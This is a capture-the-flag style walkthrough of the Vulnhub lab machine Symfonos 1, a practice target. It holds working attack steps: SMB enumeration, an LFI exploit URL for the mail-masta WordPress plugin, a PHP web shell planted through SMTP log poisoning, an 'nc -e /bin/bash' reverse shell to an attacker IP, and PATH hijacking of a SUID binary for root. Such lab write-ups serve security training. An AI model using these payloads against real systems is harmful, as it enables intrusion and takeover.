Symfonos 1 - Vulnhub

This is a write-up on the machine called Symfonos 1 on Vulnhub. It has an interesting way to spawn a shell, which was new to me.

Link to the machine: https://www.vulnhub.com/entry/symfonos-1,322/

I set the machine up on my VirtualBox, with a bridged network connection. First thing I did is find the IP of the machine using netdiscover.

sudo netdiscover -i eth0

I got the IP as 192.168.1.35. Next, I did an nmap scan on the machine.

SSH port 22, smtp port 25, http port 80 and smb ports 139 and 445 were open. I also got a domain name symfonos.local, which I added to my /etc/hosts file.

I decided to first try and enumerate SMB to see what I could find. First, I listed the available SMB shares using smbclient.

smbclient -L //192.168.1.35 -N

The two most interesting shares are helios and anonymous. First, I tried connecting to the anonymous share.

smbclient //192.168.1.35/anonymous -N

There was a text file attention.txt which I downloaded onto my machine using get attention.txt. I checked it’s contents and it gave us three possible passwords.

Next, I tried to access the helios share, but I could not do so. So, I decided to enumerate using enum4linux to see if anything else could be found.

enum4linux -a 192.168.1.35

I found a username, helios, in the output.

Using this username, I tried to connect to the helios share again and it worked. It required a password, which was qwerty, one of the passwords mentioned in the attention.txt file.

sudo smbclient //192.168.1.35/helios -U helios

The research.txt file had some information about Helios, the greek sun god. The todo.txt file was more interesting, though.

This hints that there is a directory /h3l105 somewhere. I decided to check out the webpage on port 80 now, since the directory could be present there. The website main page was a huge ancient painting of sorts.

One of these gods may be Helios. Anyway, I found the h3l105 directory. It was a wordpress page.

I explored the page a bit, but could not find anything very useful. Even tried logging in with common credentials, but no luck. So I decided to use wpscan to enumerate any vulnerable plugins that may be present.

wpscan --url http://192.168.1.35/h3l105 --plugins-detection aggressive

I found an interesting plugin mail-masta which was uncommon, and possibly vulnerable to something.

I googled for mail-masta vulnerabilities and found out that it was vulnerable to local file inclusion (LFI).

https://www.exploit-db.com/exploits/40290

Towards the bottom of the exploit-db page, there was a POC url which can be used to check if the page is indeed vulnerable.

I tried this on the h3l105 page, and it worked. The final URL I used was:

http://192.168.1.35/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

I did not know initially where to go from here, but then I found out that I can escalate the LFI to an RCE using SMTP Log Poisoning. I could check the mail logs at /var/mail/helios, and also add entries to it since SMTP port 25 was open. The URL I used to check /var/mail/helios is:

http://192.168.1.35/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

To do this, first I had to send an email with a malicious payload. The payload I used is: <?php echo system($_GET['cmd']); ?>

This will help us spawn a reverse shell. I sent the email with this payload by connecting to SMTP port 25 using telnet. I had to give values for MAIL FROM, RCPT TO and data, where I pasted the payload.

I checked /var/mail/helios again, and sure enough the payload was present.

Next, I checked if RCE works by trying to list the contents of the current directory using ls, and it worked.

http://192.168.1.35/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls

Now that this works, I tried spawning a reverse shell. To do so, first I set up a netcat listener on port 1234 using nc -lvp 1234. Then, I used the following URL:

http://192.168.1.35/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20-e%20/bin/bash%20192.168.1.40%201234

The payload is "nc -e /bin/bash 192.168.1.40 1234“. 192.168.1.40 is the IP address of my attacker machine.

Sure enough, I got the reverse shell connection on my netcat listener.

I upgraded to a tty shell using python -c 'import pty;pty.spawn("/bin/bash")' and started exploring. I could not use sudo, so I checked for SUID enabled binaries next, and found a binary at /opt/statuscheck.

find / -perm -u=s -type f 2>/dev/null

The owner of the binary is root, so we can use this to get a shell with root privileges. I used strings to try and find some clues about how statuscheck works and found that it uses curl.

We can spawn a root privilege shell by modifying the path environment variable. I went to /tmp, and created my own curl binary with contents /bin/sh. Then, I added /tmp to the beginning of $PATH so that /opt/statuscheck uses my curl instead of the default curl binary.

Now all I had to do was run statuscheck again, and I got the root privilege shell.

I read the root flag at /root and with that, the challenge is complete!

I hope you enjoyed this walkthrough. Happy hacking!




Enjoy Reading This Article?

Here are some more articles you might like to read next:

  • DerpNStink - Vulnhub
  • Djinn - Vulnhub
  • DC 9 - Vulnhub
  • W34KN3SS - Vulnhub
  • NullByte - Vulnhub